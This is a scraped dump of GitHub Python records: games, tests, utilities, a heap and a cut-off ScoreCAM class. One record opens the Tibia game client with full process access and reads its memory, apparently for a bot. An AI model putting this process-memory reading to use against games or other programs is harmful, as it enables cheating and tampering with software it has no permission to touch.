trace_exception\n","repo_name":"talkincode/toughlib","sub_path":"toughlib/logger.py","file_name":"logger.py","file_ext":"py","file_size_in_byte":6139,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"35"} +{"seq_id":"24181863372","text":"import tkinter as tk\nfrom tkinter import *\nfrom tkinter import messagebox as tmsg\nfrom tkinter.filedialog import askopenfilename, asksaveasfilename\nfrom PIL import ImageTk,Image\nimport random\ny=tk.Tk()\ny.geometry(\"350x500\")\n\ndef hi ():\n\t f=open(\"highscore.txt\",\"r\")\n\t t=f.read()\n\t \n\t a=tmsg.showinfo(\"S_C\",\"heigh score =\"+t)\n\t\n#functions\nf=open(\"highscore.txt\",\"r\")\nt=f.read()\nt=int(t)\ndef reset():\n\tcmp.set(0)\n\tpl.set(0)\n\tcmscore.config(textvariable=cmp)\n\tplscore.config(textvariable=pl)\ndef help():\n a=tmsg.showinfo(\"help\",\"hasnain will help you\")\ndef rate():\n a=tmsg.askquestion(\"was your experience good\",\"was you experience good\")\n if a==\"yes\":\n tmsg.showinfo(\"nice\",\"rate us on playstore\")\n else:\n tmsg.showinfo(\"ohh no\",\"tell us whats wrong we will fix\")\n\ndef te():\n y.configure(bg=\"teal\")\n fb.configure(bg=\"teal\")\ndef pu():\n y.configure(bg=\"purple\")\ndef wall():\n y.configure(bg=\"teal\")\ndef gr():\n y.configure(bg=\"gray\")\ndef ora():\n y.configure(bg=\"#6b59b6\") \n \n \n #images\n \ny.configure(bg=\"#6b59b6\")\nf=Frame(y).place(x=0,y=0)\n#r2=ImageTk.PhotoImage(file=\"bd2.jpg\")\n#global com\n#background=Label(y,image=r2,bd=0).place(x=0,y=0)\ny.title(\"game\")\nglobal p22\np22=ImageTk.PhotoImage(file=\"p222.jpg\")\nglobal s22\ns22=ImageTk.PhotoImage(file=\"s222.jpg\")\nglobal r22\t\nr22=ImageTk.PhotoImage(Image.open(\"r222.jpg\"))\n\nplay=Label(y,image=p22,bd=0)\nplay.place(x=430,y=300)\n\n\n\n#main functions\ndef sei():\n\tglobal com\n\tglobal play\n\tc=cmp.get()\n\tl=pl.get()\n\ta=random.randrange(1,4)\n\tif a==1:\n\t\t\t#c=c+1\n\t\t#cmp.set(c)\n\t\tl=l+1\n\t\tpl.set(l)\n\t\tcmscore.config(textvariable=cmp)\n\t\tplscore.config(textvariable=pl)\n\t\twi.set(\"you win\")\n\t\twin.config(textvariable=wi)\n\t\tcomp_img.config(image=p22)\n\t\tplay.config(image=s22)\n\tif a==2:\n\t\t#cmscore.config(textvariable=cm)\n\t\tplscore.config(textvariable=pl)\n\t\twi.set(\" Draw\")\n\t\twin.config(textvariable=wi)\n\t\tcomp_img.config(image=s22)\n\t\tplay.config(image=s22)\n\tif a==3:\n\t\tc=c+1\n\t\tcmp.set(c)\n\t\t#l=l+1\n\t\t#pl.set(l)\n\t\tcmscore.config(textvariable=cmp)\n\t\tplscore.config(textvariable=pl)\n\t#\tcmscore.config(textvariable=cm)\n\t\tplscore.config(textvariable=pl)\n\t\twi.set(\"you lose\")\n\t\twin.config(textvariable=wi)\n\t\tcomp_img.config(image=r22)\n\t\tplay.config(image=s22)\n\tif l > t:\n f=open(\"highscore.txt\",\"w\")\n f.write(str(l))\n f.close()\n\n\ndef rock ():\n\tglobal com\n\tglobal play\n\t#cmp global\n\tc=cmp.get()\n\tl=pl.get()\n\t\n\t\n\ta=random.randrange(1,4)\n\tif a==1:\n\t\t\t#c=c+1\n\t\t#cmp.set(c)\n\t\tl=l+1\n\t\tpl.set(l)\n\t\tcmscore.config(textvariable=cmp)\n\t\tplscore.config(textvariable=pl)\n\t\t\n\t\t\n\t\twi.set(\"you win\")\n\t\twin.config(textvariable=wi)\n\t\tcomp_img.config(image=p22)\n\t\tplay.config(image=r22)\n\tif a==2:\n\t\t#c=c+1\n\t\t#cmp.set(c)\n\t\tl=l+1\n\t\tpl.set(l)\n\t\tcmscore.config(textvariable=cmp)\n\t\tplscore.config(textvariable=pl)\n\t\twi.set(\"you win\")\n\t\twin.config(textvariable=wi)\n\t\tcomp_img.config(image=s22)\n\t\tplay.config(image=r22)\n\tif a==3:\n\t\n\t\twi.set(\" 
Draw\")\n\t\twin.config(textvariable=wi)\n\t\tcomp_img.config(image=r22)\n\t\tplay.config(image=r22)\n\tif l > t:\n f=open(\"highscore.txt\",\"w\")\n f.write(str(l))\n f.close()\n\ndef pap():\n\tglobal com\n\tglobal play\n\tc=cmp.get()\n\tl=pl.get()\n\ta=random.randrange(1,4)\n\tif a==1:\n\t\twi.set(\" Draw\")\n\t\twin.config(textvariable=wi)\n\t\tcomp_img.config(image=p22)\n\t\tplay.config(image=p22)\n\tif a==2:\n\t\tc=c+1\n\t\tcmp.set(c)\n\t\t#l=l+1\n\t\t#pl.set(l)\n\t\tcmscore.config(textvariable=cmp)\n\t\tplscore.config(textvariable=pl)\n\t\twi.set(\"You lose\")\n\t\twin.config(textvariable=wi)\n\t\tcomp_img.config(image=s22)\n\t\tplay.config(image=p22)\n\tif a==3:\n\t\tc=c+1\n\t\tcmp.set(c)\n\t\t#l=l+1\n\t\t#pl.set(l)\n\t\tcmscore.config(textvariable=cmp)\n\t\tplscore.config(textvariable=pl)\n\t\twi.set(\"You lose\")\n\t\twin.config(textvariable=wi)\n\t\tcomp_img.config(image=r22)\n\t\tplay.config(image=p22)\n\t\t\n\tif l > t:\n f=open(\"highscore.txt\",\"w\")\n f.write(str(l))\n f.close()\n\t\ndef exit():\n\ty.destroy()\n\tpass\n\t\n\t\nfb=Label(y,text=\"paper seisor and rock\",fg=\"white\",bg=\"#6b59b6\",font=\"comiscansms 18 bold\")\nfb.pack(fill=X,pady=6)\n\n\n\n#labels\ncomp_img=tk.Label(y,image=p22)\ncomp_img.place(x=20,y=300)\n\n\nf=Label(y,text=\"computer\",fg=\"white\",bg=\"#6b59b6\",font=\"comiscansms 15 bold\")\nf.place(x=20,y=200)\nf=Label(y,text=\"vs\",fg=\"white\",bg=\"#6b59b6\",font=\"comiscansms 15 bold\")\nf.place(x=340,y=400)\n\nwi=StringVar()\nwi.set(\"who win?\")\nwin=Label(y,textvariable=wi,fg=\"white\",font=\"comiscansms 15 bold\",bd=0,bg=\"#6b59b6\",pady=10)\nwin.place(x=240,y=740)\nfhjb=Label(y,text=\"player\",fg=\"white\",bg=\"#6b59b6\",font=\"comiscansms 15 bold\",width=7)\nfhjb.place(x=480,y=200)\npaper=Button(y,text=\"Paper\",width=13,font=\"comiscansms 9 bold\",fg=\"white\",bg=\"red\",command=pap).place(x=20,y=1000)\nseisor=Button(y,text=\"Seisor\",width=13,font=\"comiscansms 9 bold\",fg=\"red\",bg=\"yellow\",command=sei).place(x=380,y=1000)\nrock=Button(y,text=\"Rock\",width=16,font=\"comiscansms 9 bold\",fg=\"white\",bg=\"orange\",command=rock).place(x=150,y=1120)\nreset=Button(y,text=\"Restart\",width=9,font=\"comiscansms 9 bold\",fg=\"white\",bg=\"teal\",command=reset).place(x=260,y=1300)\nexit=Button(y,text=\"Exit\",width=5,font=\"comiscansms 9 bold\",fg=\"white\",bg=\"teal\",command=exit)\nexit.place(x=520,y=1380)\nhighscore=Button(y,text=\"heigh score\",width=8,font=\"comiscansms 9 bold\",fg=\"white\",bg=\"teal\",command=hi).place(x=20,y=1380)\ncmp=IntVar()\ncmp.set(0)\ncmscore=Label(y,textvariable=cmp,font=\"comiscansms 18 bold\",bg=\"#6b59b6\",fg=\"white\")\ncmscore.place(x=50,y=740)\npl=IntVar()\npl.set(0)\nplscore=Label(y,textvariable=pl,font=\"comiscansms 18 bold\",bg=\"#6b59b6\",fg=\"white\")\nplscore.place(x=620,y=740)\n\n\n#menues\n \nmenu2=Menu(y)\nm1=Menu(menu2,tearoff=0)\nm1.add_command(label=\"teal\",command=te)\nm1.add_command(label=\"purple\",command=pu)\nm1.add_command(label=\"wall\",command=wall)\nm1.add_command(label=\"gray\",command=gr)\nm1.add_command(label=\"orange\",command=ora)\nmenu2.add_cascade(label=\"background colour change\",menu=m1)\nmenu2.add_command(label=\"help\",command=help)\nmenu2.add_command(label=\"Rate us\",command=rate)\ny.config(menu=menu2) \nmenu2=Menu(y)\nm1=Menu(menu2,tearoff=0)\nm1.add_command(label=\"teal\",command=te)\nm1.add_command(label=\"purple\",command=pu)\nm1.add_command(label=\"wall\",command=wall)\nm1.add_command(label=\"gray\",command=gr)\nm1.add_command(label=\"Default 
colur\",command=ora)\nmenu2.add_cascade(label=\"background colour change\",menu=m1)\nmenu2.add_command(label=\"help\",command=help)\nmenu2.add_command(label=\"Rate us\",command=rate)\ny.config(menu=menu2)\n\n\ny.mainloop()\n","repo_name":"Hasnain-Rajpoot/paper_seisor-and-rock","sub_path":"new_final_game/final game.py","file_name":"final game.py","file_ext":"py","file_size_in_byte":6480,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"20203175741","text":"import pytest\nimport requests\nfrom source_google_analytics_data_api.api_quota import GoogleAnalyticsApiQuota\n\nTEST_QUOTA_INSTANCE: GoogleAnalyticsApiQuota = GoogleAnalyticsApiQuota()\n\n\n@pytest.fixture(name=\"expected_quota_list\")\ndef expected_quota_list():\n \"\"\"The Quota were currently handle\"\"\"\n return [\"concurrentRequests\", \"tokensPerProjectPerHour\", \"potentiallyThresholdedRequestsPerHour\"]\n\n\ndef test_check_initial_quota_is_empty():\n \"\"\"\n Check the initial quota property is empty (== None), but ready to be fullfield.\n \"\"\"\n assert not TEST_QUOTA_INSTANCE.initial_quota\n\n\n@pytest.mark.parametrize(\n (\"response_quota\", \"partial_quota\", \"should_retry_exp\", \"backoff_time_exp\", \"raise_on_http_errors_exp\", \"stop_iter_exp\"),\n [\n # Full Quota\n (\n {\n \"propertyQuota\": {\n \"concurrentRequests\": {\"consumed\": 0, \"remaining\": 10},\n \"tokensPerProjectPerHour\": {\"consumed\": 1, \"remaining\": 1735},\n \"potentiallyThresholdedRequestsPerHour\": {\"consumed\": 1, \"remaining\": 26},\n }\n },\n False,\n True,\n None,\n True,\n False,\n ),\n # Partial Quota\n (\n {\n \"propertyQuota\": {\n \"concurrentRequests\": {\"consumed\": 0, \"remaining\": 10},\n \"tokensPerProjectPerHour\": {\"consumed\": 5, \"remaining\": 955},\n \"potentiallyThresholdedRequestsPerHour\": {\"consumed\": 3, \"remaining\": 26},\n }\n },\n True,\n True,\n None,\n True,\n False,\n ),\n # Running out `tokensPerProjectPerHour`\n (\n {\n \"propertyQuota\": {\n \"concurrentRequests\": {\"consumed\": 2, \"remaining\": 8},\n \"tokensPerProjectPerHour\": {\n \"consumed\": 5,\n # ~9% from original quota is left\n \"remaining\": 172,\n },\n \"potentiallyThresholdedRequestsPerHour\": {\"consumed\": 3, \"remaining\": 26},\n }\n },\n True,\n True,\n 1800,\n False,\n False,\n ),\n # Running out `concurrentRequests`\n (\n {\n \"propertyQuota\": {\n \"concurrentRequests\": {\n \"consumed\": 9,\n # 10% from original quota is left\n \"remaining\": 1,\n },\n \"tokensPerProjectPerHour\": {\"consumed\": 5, \"remaining\": 935},\n \"potentiallyThresholdedRequestsPerHour\": {\"consumed\": 1, \"remaining\": 26},\n }\n },\n True,\n True,\n 30,\n False,\n False,\n ),\n # Running out `potentiallyThresholdedRequestsPerHour`\n (\n {\n \"propertyQuota\": {\n \"concurrentRequests\": {\"consumed\": 1, \"remaining\": 9},\n \"tokensPerProjectPerHour\": {\"consumed\": 5, \"remaining\": 935},\n \"potentiallyThresholdedRequestsPerHour\": {\n # 7% from original quota is left\n \"consumed\": 26,\n \"remaining\": 2,\n },\n }\n },\n True,\n True,\n 1800,\n False,\n False,\n ),\n ],\n ids=[\n \"Full\",\n \"Partial\",\n \"Running out tokensPerProjectPerHour\",\n \"Running out concurrentRequests\",\n \"Running out potentiallyThresholdedRequestsPerHour\",\n ],\n)\ndef test_check_full_quota(\n requests_mock,\n expected_quota_list,\n response_quota,\n partial_quota,\n should_retry_exp,\n backoff_time_exp,\n raise_on_http_errors_exp,\n stop_iter_exp,\n):\n \"\"\"\n Check the quota and prepare the initial 
values for subsequent comparison with subsequent response calls.\n The default values for the scenario are expected when the quota is full.\n \"\"\"\n # Prepare instance\n url = \"https://analyticsdata.googleapis.com/v1beta/\"\n payload = response_quota\n requests_mock.post(url, json=payload)\n response = requests.post(url)\n # process and prepare the scenario\n TEST_QUOTA_INSTANCE._check_quota(response)\n\n # TEST BLOCK\n\n # Check the INITIAL QUOTA is saved properly\n assert [quota in expected_quota_list for quota in TEST_QUOTA_INSTANCE.initial_quota.keys()]\n\n # Check the CURRENT QUOTA is different from Initial\n if partial_quota:\n current_quota = TEST_QUOTA_INSTANCE._get_known_quota_from_response(response.json().get(\"propertyQuota\"))\n assert not current_quota == TEST_QUOTA_INSTANCE.initial_quota\n\n # Check the scenario is applied based on Quota Values\n # should_retry\n assert TEST_QUOTA_INSTANCE.should_retry is should_retry_exp\n # backoff_time\n assert TEST_QUOTA_INSTANCE.backoff_time == backoff_time_exp\n # raise_on_http_errors\n assert TEST_QUOTA_INSTANCE.raise_on_http_errors is raise_on_http_errors_exp\n # stop_iter\n assert TEST_QUOTA_INSTANCE.stop_iter is stop_iter_exp\n","repo_name":"airbytehq/airbyte","sub_path":"airbyte-integrations/connectors/source-google-analytics-data-api/unit_tests/test_api_quota.py","file_name":"test_api_quota.py","file_ext":"py","file_size_in_byte":5292,"program_lang":"python","lang":"en","doc_type":"code","stars":12323,"dataset":"github-code","pt":"35"} +{"seq_id":"19185653656","text":"fn=open('D:/anjumca/pg/abc.txt','r')\r\nfn1=open('aa.txt','w+')\r\ncont=fn.readlines()\r\nprint(cont)\r\nfor i in range(0, len(cont)):\r\n\tif(i % 2 ==0):\r\n\t\tfn1.write(cont[i])\r\n\telse:\r\n\t\tcontinue\r\nfn1.close()\r\nfn1=open('aa.txt','r')\r\nprint(fn1.read())\r\nfn1.close()","repo_name":"Anjukpaul/PYTHON","sub_path":"file3.py","file_name":"file3.py","file_ext":"py","file_size_in_byte":254,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"28843350828","text":"import ctypes, win32ui, win32gui, win32process, win32api, clientprocess, control, pprint\n\n\nclass Memory:\n def __init__(self):\n PROCESS_ALL_ACCESS = 0x1F0FFF\n self.rPM = ctypes.windll.kernel32.ReadProcessMemory\n self.wPM = ctypes.windll.kernel32.WriteProcessMemory\n self.CLIENT = self.getClientByConsole()\n self.HANDLE = win32api.OpenProcess(PROCESS_ALL_ACCESS, 0, self.CLIENT.pid[1])\n self.BASEADDRESSLIST = win32process.EnumProcessModulesEx(self.HANDLE.handle)\n for BA in self.BASEADDRESSLIST:\n if \"Qt5Core.dll\" in win32process.GetModuleFileNameEx(self.HANDLE.handle, BA):\n self.QT5CORE = BA\n elif \"client.exe\" in win32process.GetModuleFileNameEx(self.HANDLE.handle, BA):\n self.MAINMODULE = BA\n self.BASEADDRESS = self.BASEADDRESSLIST[0]\n\n def dump(self):\n print()\n print(\"HWND : \" + str(self.CLIENT.hwnd))\n print(\"PID : \" + str(self.CLIENT.pid))\n print(\"HANDLE : \" + str(self.HANDLE.handle))\n print(\"BASEADDRESS : \" + str(self.BASEADDRESS))\n\n def getWindowTitle(self, hwid):\n return win32gui.GetWindowText(hwid)\n\n def getDefaultTibiaHandle(self):\n return self.gettibiahandle()[0].GetSafeHwnd()\n\n def getClientByConsole(self):\n clientList = self.gettibiaclients()\n iter = 0\n if len(clientList) == 1:\n return clientList[0]\n else:\n for Client in clientList:\n print(str(iter) + \": \" + win32gui.GetWindowText(Client.hwnd))\n iter += 1\n res = input(\"Select a client: \")\n print(\"You selected client \" + 
win32gui.GetWindowText(clientList[int(res)].hwnd))\n return clientList[int(res)]\n\n @staticmethod\n def gettibiaclients():\n clientList = []\n i = 0\n for Client in Memory.gettibiahandle():\n clientList.insert(i, clientprocess.ClientProcess(Client, win32gui.GetWindowText(Client), win32process.GetWindowThreadProcessId(Client)))\n i += 1\n return clientList\n\n\n @staticmethod\n def gettibiahandle():\n hwndList = []\n currentHwnd = win32ui.FindWindowEx(None, None, \"Qt5QWindowOwnDCIcon\", None).GetSafeHwnd()\n hwndList.insert(0, currentHwnd)\n i = 1\n while currentHwnd != None:\n try:\n currentHwnd = win32ui.FindWindowEx(None, currentHwnd, \"Qt5QWindowOwnDCIcon\", None).GetSafeHwnd()\n hwndList.insert(i, currentHwnd)\n except win32ui.error:\n currentHwnd = None\n i += 1\n return hwndList\n\n def readString(self, Address, Len):\n bytesread = ctypes.c_ulong(0)\n buff = ctypes.create_string_buffer(Len)\n self.rPM(self.HANDLE.handle, Address, ctypes.byref(buff), Len, ctypes.byref(bytesread))\n print(bytesread.value)\n val = ctypes.string_at(buff, Len).decode(\"utf-16\")\n return val\n\n def readIntDirect(self, Address):\n val = ctypes.c_long()\n buffersize = ctypes.sizeof(val)\n bytesread = ctypes.c_ulong(0)\n self.rPM(self.HANDLE.handle, Address, ctypes.byref(val), buffersize, ctypes.byref(bytesread))\n return val\n\n def readShortDirect(self, Address):\n val = ctypes.c_ushort()\n buffersize = ctypes.sizeof(val)\n bytesread = ctypes.c_ulong(0)\n self.rPM(self.HANDLE.handle, Address, ctypes.byref(val), buffersize, ctypes.byref(bytesread))\n #print(type(val.value))\n return val\n\n def readPtrInt(self, Address):\n data = ctypes.c_long(0)\n iter = 0\n for i in Address:\n if iter == 0:\n toread = ctypes.c_long(i + self.QT5CORE).value\n data = self.readIntDirect(toread)\n iter += 1\n elif iter == len(Address) - 1:\n toread = ctypes.c_long(data.value + i).value\n data = self.readIntDirect(toread)\n return data.value\n else:\n toread = ctypes.c_long(data.value + i).value\n data = self.readIntDirect(toread)\n iter += 1\n\n def readPtrShort(self, Address):\n data = ctypes.c_long(0)\n iter = 0\n for i in Address:\n if iter == 0:\n toread = ctypes.c_long(i + self.QT5CORE).value\n data = self.readIntDirect(toread)\n iter += 1\n elif iter == len(Address) - 1:\n res = ctypes.c_short(0)\n toread = ctypes.c_long(data.value + i).value\n res = self.readShortDirect(toread)\n return res.value\n else:\n toread = ctypes.c_long(data.value + i).value\n data = self.readIntDirect(toread)\n iter += 1","repo_name":"TheJoshGriffith/PythonHealer","sub_path":"memory.py","file_name":"memory.py","file_ext":"py","file_size_in_byte":4835,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"30787198747","text":"start = 'a b c d e f g h i j k l m n o p'.split()\norder = 'a b c d e f g h i j k l m n o p'.split()\nseen = []\n\ninstructions = input().strip().split(',')\n\nfor i in range(1000000000):\n for instruction in instructions:\n move = instruction[0]\n if move == 's':\n size = int(instruction[1:])\n order = order[-size:] + order[:-size]\n \n elif move == 'x':\n pos1, pos2 = [int(pos) for pos in instruction[1:].split('/')]\n order[pos1], order[pos2] = order[pos2], order[pos1] \n \n elif move == 'p':\n prog1, prog2 = [prog for prog in instruction[1:].split('/')]\n pos1, pos2 = order.index(prog1), order.index(prog2)\n order[pos1], order[pos2] = order[pos2], order[pos1] \n\n if ''.join(order) not in seen:\n seen.append(''.join(order))\n print(''.join(order), i+1)\n else:\n 
print()\n print(seen[(1000000000%(i+1))+2])\n break\n","repo_name":"MikosJon/AdventOfCode2017","sub_path":"day16/part2.py","file_name":"part2.py","file_ext":"py","file_size_in_byte":957,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"19219362046","text":"from typing import List\nfrom xml.etree import ElementTree as ET\n\nfrom .utils import *\nfrom .level import Level\nfrom .exceptions import InvalidXMLData\n\n\nclass LocalLevels:\n\tdef __init__(self, debug=False):\n\t\tself.debug: bool = debug\n\t\tself.levels: List[Level] = []\n\n\tdef dlog(self, text: str):\n\t\tif not self.debug:\n\t\t\treturn\n\n\t\tprint(f\"[DEBUG][LLS]: {text}\")\n\n\tdef load_file(self, file: str):\n\t\tfile = open(file, \"rb\")\n\t\tdata = file.read()\n\n\t\tdata = decrypt_level(data)\n\t\tself.dlog(data)\n\t\troot = ET.fromstring(data)\n\n\t\tlevels_root = root.find(\"dict\").find(\"d\")\n\t\tfor level_data in levels_root.findall(\"d\"):\n\t\t\tkey_found = False\n\t\t\tkey_name = \"\"\n\t\t\tvalues = {}\n\n\t\t\tfor elem in level_data.iter():\n\t\t\t\tif elem.tag == \"k\":\n\t\t\t\t\tif key_found:\n\t\t\t\t\t\traise InvalidXMLData(\"key is found after another key\")\n\n\t\t\t\t\tkey_name = elem.text\n\t\t\t\t\tkey_found = True\n\t\t\t\telif key_found:\n\t\t\t\t\tvalues[key_name] = elem.text\n\t\t\t\t\tkey_found = False\n\n\t\t\tlevel = Level()\n\t\t\tlevel.load(values)\n\t\t\tself.levels.append(level)\n\n\t\tfile.close()\n\n\tdef save_file(self, file: str):\n\t\traw_levels_data = []\n\n\t\tfor level in self.levels:\n\t\t\traw_levels_data.append(level.save())\n\n\t\tlevels_data = \\\n\t\t\t\"\" \\\n\t\t\t\"\" \\\n\t\t\t\"\" \\\n\t\t\t\"LLM_01\" \\\n\t\t\t\"\" \\\n\t\t\t\"_isArr\" \\\n\t\t\t\"\".encode()\n\t\tlevel_id = 0\n\n\t\tfor level_data in raw_levels_data:\n\t\t\tlevels_data += f\"k_{level_id}\".encode()\n\t\t\tlevels_data += level_data\n\n\t\t\tlevel_id += 1\n\n\t\tlevels_data += \\\n\t\t\t\"\" \\\n\t\t\t\"LLM_02\" \\\n\t\t\t\"35\" \\\n\t\t\t\"\" \\\n\t\t\t\"\".encode()\n\n\t\tlevels_data = encrypt_level(levels_data)\n\n\t\tf = open(file, \"wb\")\n\t\tf.write(levels_data)\n","repo_name":"Myr-13/gdapi","sub_path":"gdapi/local_levels.py","file_name":"local_levels.py","file_ext":"py","file_size_in_byte":1669,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"9766920052","text":"import re\n\nfrom core.providers import INPUT_PROVIDERS\n\n\nclass MusicUrl(object):\n def __init__(self, url, provider=None):\n self.url = url\n\n self.__provider = provider\n\n @property\n def provider(self):\n if self.__provider is None:\n self.__provider = self.__get_provider()\n \n return self.__provider\n\n def __get_provider(self):\n for provider_cls in INPUT_PROVIDERS:\n if provider_cls.is_music_url(self.url):\n return provider_cls()\n\n raise ValueError(f'Unable to find provider for {self.url}')\n\n def get_name(self):\n return self.provider.get_music_name(self.url)\n\n\nclass UrlsExtractor(object):\n URL_REGEX = re.compile(r'(https?://[^\\s]+)')\n\n @classmethod\n def get_urls(cls, message):\n for match in cls.URL_REGEX.finditer(message):\n yield match.group(1)\n\n @classmethod\n def get_music_urls(cls, message):\n urls = cls.get_urls(message)\n unique_urls = set()\n for url in urls:\n if url not in unique_urls:\n unique_urls.add(url)\n music_url = cls.__to_music_url(url)\n if music_url:\n yield music_url\n\n @classmethod\n def __to_music_url(cls, url):\n \"\"\"\n Returns instance of MusicUrl with provider 
if possible\n        :param url: url to parse\n        :return: MusicUrl\n        \"\"\"\n        for provider in INPUT_PROVIDERS:\n            if provider.is_music_url(url):\n                return MusicUrl(url, provider())\n","repo_name":"Ignisor/music-share-bot","sub_path":"core/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1552,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"35"} +{"seq_id":"35507164178","text":"import MetaTrader5 as mt5\nimport datetime as dt\nimport time\n\nmt5.initialize()\n\nposition = mt5.positions_get(symbol='USDTRY')\n# print(position)\n\ndef profit(position):\n\n    if position[0].type == 0: #For long positions\n        type_ = mt5.ORDER_TYPE_BUY\n    else:\n        type_ = mt5.ORDER_TYPE_SELL\n\n    profit = mt5.order_calc_profit(type_, position[0].symbol, position[0].volume, position[0].price_open, position[0].sl)\n    return profit\n\nk = profit(position)\nprint(k)\n\nmt5.shutdown()","repo_name":"Kiran-Sawant/Risk-Monitor","sub_path":"temp_scripts/calc_profit.py","file_name":"calc_profit.py","file_ext":"py","file_size_in_byte":498,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"35"} +{"seq_id":"37848440561","text":"\"\"\"\nHeap (min-heap) implementation example\n\"\"\"\n\nfrom random import sample\n\n\nHEAP_SIZE = 20\n\n\nclass EmptyHeapError(Exception):\n    def __init__(self):\n        super().__init__(\"No elements in the heap\")\n\n\nclass Heap:\n    def __init__(self):\n        self.__heap = [0]\n\n    @property\n    def size(self) -> int:\n        return len(self.__heap) - 1\n\n    def __len__(self) -> int:\n        return self.size\n\n    @property\n    def is_empty(self) -> bool:\n        return self.size <= 0\n\n    def insert(self, item: int) -> None:\n        self.__heap.append(item)\n        self.arrange(self.size)\n\n    def __iter__(self):\n        self.__current = 0\n        return self\n\n    def __next__(self):\n        self.__current += 1\n        if self.__current <= self.size:  # stop after the last stored item; testing is_empty here never raised StopIteration and ran past the end\n            return self.__heap[self.__current]\n        else:\n            raise StopIteration\n\n    def arrange(self, index: int) -> None:\n        \"\"\"Rebalances tree\"\"\"\n        parent_index = index // 2\n        if parent_index <= 0:\n            return\n        if self.__heap[index] < self.__heap[parent_index]:\n            self.__heap[index], self.__heap[parent_index] = (\n                self.__heap[parent_index],\n                self.__heap[index],\n            )\n            self.arrange(parent_index)\n\n    def _child_min_index(self, index: int) -> int:\n        \"\"\"Finds child min index that has min value\n\n        For instance two children 10, 6 with indexes 3, 4\n        will return index 4\n        \"\"\"\n        l_index = index * 2\n        r_index = l_index + 1\n        if self.size < r_index:\n            return l_index\n        return l_index if self.__heap[l_index] < self.__heap[r_index] else r_index\n\n    def sink(self, index: int) -> None:\n        \"\"\"Rebalances the tree when item is popped\"\"\"\n        child_index = self._child_min_index(index)\n        if self.size < child_index:\n            return\n        if self.__heap[child_index] < self.__heap[index]:\n            self.__heap[index], self.__heap[child_index] = (\n                self.__heap[child_index],\n                self.__heap[index],\n            )\n            self.sink(child_index)\n\n    def pop(self) -> int:\n        \"\"\"Pop root (lowest element) of the tree\"\"\"\n        if self.is_empty:\n            raise EmptyHeapError()\n        item = self.__heap[1]\n        # get latest element in the heap and put it to the root of the tree\n        last_item = self.__heap.pop()\n        if not self.is_empty:\n            self.__heap[1] = last_item\n        # rebalance a tree\n        self.sink(1)\n        return item\n\n    def clear(self):\n        self.__heap = [0]\n\n    def __repr__(self):\n        return str(self.__heap[1:])\n\n\ndef main():\n    heap = Heap()\n    assert heap.size == len(heap) == 0\n    assert heap.is_empty is True\n\n    items = [i for i in 
\n    for item in items:\n        heap.insert(item)\n\n    assert heap.size == len(heap) == HEAP_SIZE\n    print(f\"items: {items}\")\n    print(f\"heap: {heap}\")\n\n    heap.clear()\n    assert heap.is_empty is True\n    assert heap.size == 0\n\n    items = [4, 8, 7, 2, 9, 10, 5, 1, 3, 6]\n    for item in items:\n        heap.insert(item)\n        print(f\"item: {item}, heap: {heap}\")\n\n    while not heap.is_empty:\n        item = heap.pop()\n        print(f\"item: {item}, heap: {heap}\")\n\n    try:\n        heap.pop()\n        assert False, \"Failed. There are no elements in the heap\"\n    except EmptyHeapError as ex:\n        print(f\"Exception: {ex}\")\n\n\nif __name__ == \"__main__\":\n    main()\n","repo_name":"vlad-bezden/data_structures_and_algorithms","sub_path":"data_structures_and_algorithms/heap.py","file_name":"heap.py","file_ext":"py","file_size_in_byte":3453,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"32213189235","text":" \nimport torch\nimport torch.nn.functional as F\nfrom cam.basecam import *\nimport math\n\nclass ScoreCAM(BaseCAM):\n\n    \"\"\"\n    ScoreCAM, inherit from BaseCAM\n    \"\"\"\n\n    def __init__(self, model_dict):\n        super().__init__(model_dict)\n\n    def forward(self, input, class_idx=None, retain_graph=False):\n        b, c, h, w = input.size()\n        self.device = 'cuda' if torch.cuda.is_available() else 'cpu'\n        self.input_ = input\n        # prediction on raw input\n        logit = self.model_arch(input).cuda()\n\n        if class_idx is None:\n            predicted_class = logit.max(1)[-1]\n            self.class_idx = predicted_class\n            score = logit[:, logit.max(1)[-1]].squeeze()\n        else:\n            predicted_class = torch.LongTensor([class_idx])\n            self.class_idx = predicted_class\n            score = logit[:, class_idx].squeeze()\n\n        logit = F.softmax(logit, dim=-1)\n\n        if torch.cuda.is_available():\n            predicted_class = predicted_class.cuda()\n            score = score.cuda()\n            logit = logit.cuda()\n\n        self.model_arch.zero_grad()\n\n        activations = self.activations['value']\n        b, k, u, v = activations.size()\n\n        score_saliency_map = torch.zeros((1, 1, h, w))\n\n        if torch.cuda.is_available():\n            activations = activations.cuda()\n            score_saliency_map = score_saliency_map.cuda()\n\n        with torch.no_grad():\n            norm_saliency_maps = torch.zeros(k,1,224,224)\n            for i in range(k):\n\n                # upsampling\n                saliency_map = torch.unsqueeze(activations[:, i, :, :], 1)\n                saliency_map = F.interpolate(saliency_map, size=(h, w), mode='bilinear', align_corners=False)\n\n                if saliency_map.max() == saliency_map.min():\n                    continue\n\n                # normalize to 0-1\n                norm_saliency_map = (saliency_map - saliency_map.min()) / (saliency_map.max() - saliency_map.min())\n                norm_saliency_maps[i:i+1] = norm_saliency_map\n            # how much increase if keeping the highlighted region\n            # prediction on masked input\n            score_list = torch.zeros(k)\n            # divide batch\n            last_idx = -1\n            batch_size = 32\n            N = k\n            for i in range(math.floor(N/batch_size)):\n                mask_batch = norm_saliency_maps[i*batch_size:(i+1)*batch_size]\n                target_score = self.BatchScoreComputation(mask_batch)\n                score_list[i*batch_size:(i+1)*batch_size] = target_score\n                last_idx = i\n            # last batch\n            if (last_idx+1)*batch_size < N:\n                mask_batch = norm_saliency_maps[(last_idx+1)*batch_size:]\n                target_score = 